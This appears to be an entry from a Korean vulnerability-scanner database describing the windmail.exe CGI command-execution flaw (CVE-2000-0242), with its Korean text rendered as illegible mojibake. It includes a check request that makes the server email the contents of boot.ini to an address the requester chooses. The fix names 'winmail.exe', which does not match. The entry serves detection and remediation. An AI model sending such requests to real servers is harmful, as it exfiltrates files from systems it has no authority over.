| Ãë¾àÁ¡ID |
21101 |
| À§Çèµµ |
40 |
| Æ÷Æ® |
80, ... |
| ÇÁ·ÎÅäÄÝ |
TCP |
| ºÐ·ù |
CGI |
| »ó¼¼¼³¸í |
ÇØ´ç À¥¼¹ö¿¡ "windmail.exe" CGI°¡ ¼³Ä¡µÇ¾î ÀÖ´Ù. ÀÌ CGIÀÇ ¸î¸î ¹öÀü¿¡¼ ¿ÜºÎ¿¡¼ ¼¹ö³»ÀÇ ÀÓÀÇÀÇ ¸í·ÉÀ» ¼öÇà½Ãų ¼ö ÀÖ°Ô ÇØ ÁÖ´Â Ãë¾àÁ¡ÀÌ ÀÖ´Ù. (pipe-command¸¦ ÅëÇÏ¿©) ´ÙÀ½°ú °°ÀÌ ¿äûÀ» Çϸé À̸¦ °ËÁ¡ÇÒ ¼ö ÀÖ´Ù.
GET /cgi-bin/windmail.exe?-n%20c:\boot.ini%20myid@myaddress.com
(my@myaddress.comÀº ½ÇÁ¦ Email ÁÖ¼Ò·Î ´ëüµÇ¾î¾ß ÇÑ´Ù)
ÀÌ·¸°Ô ÇÑÈÄ boot.iniÀÇ ³»¿ëÀÌ ÀÌ Email ÁÖ¼Ò·Î ¹è´ÞµÇ¸é Ãë¾àÁ¡ÀÌ ½ÇÁ¦·Î Á¸ÀçÇÑ´Ù.
* Âü°í »çÀÌÆ®:
http://www.securityfocus.com/bid/1073
http://www.iss.net/security_center/static/4187.php
* ¿µÇâÀ» ¹Þ´Â Ç÷§Æû:
Web Server |
| ÇØ°áÃ¥ |
/cgi-bin µð·ºÅ丮¿¡ ÀÖ´Â "winmail.exe" ÆÄÀÏÀ» »èÁ¦ÇÑ´Ù. |
| °ü·Ã URL |
CVE-2000-0242 (CVE) |
| °ü·Ã URL |
(SecurityFocus) |
| °ü·Ã URL |
(ISS) |
|
